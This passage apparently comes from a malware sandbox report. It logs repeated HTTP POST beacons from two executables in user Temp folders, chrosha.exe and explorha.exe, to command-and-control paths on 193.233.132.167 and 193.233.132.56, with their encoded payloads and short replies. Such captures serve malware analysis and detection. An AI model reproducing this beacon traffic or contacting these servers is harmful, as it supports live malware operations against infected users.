                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      867192.168.2.550716193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:57.961467028 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:58.208513975 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      868192.168.2.550717193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:58.238692999 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:58.486506939 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      869192.168.2.550718193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:58.574690104 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:58.825308084 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      870192.168.2.550719193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:58.835059881 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:59.076713085 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      871192.168.2.550720193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:59.078949928 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:59.329955101 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      872192.168.2.550721193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:59.329852104 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:59.581497908 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      873192.168.2.550722193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:59.702939987 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:59.954283953 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      874192.168.2.550723193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:59.947932959 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:00.196017027 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      875192.168.2.550724193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:00.211196899 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:00.467350960 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      876192.168.2.550725193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:00.445892096 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:00.694122076 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      877192.168.2.550726193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:00.824078083 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:01.072170019 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      878192.168.2.550727193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:01.055386066 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:01.297883987 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      879192.168.2.550728193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:01.327521086 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:01.581912994 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      880192.168.2.550729193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:01.547175884 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:01.795555115 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      881192.168.2.550730193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:01.943769932 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:02.191571951 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      882192.168.2.550731193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:02.149661064 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:02.397720098 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      883192.168.2.550732193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
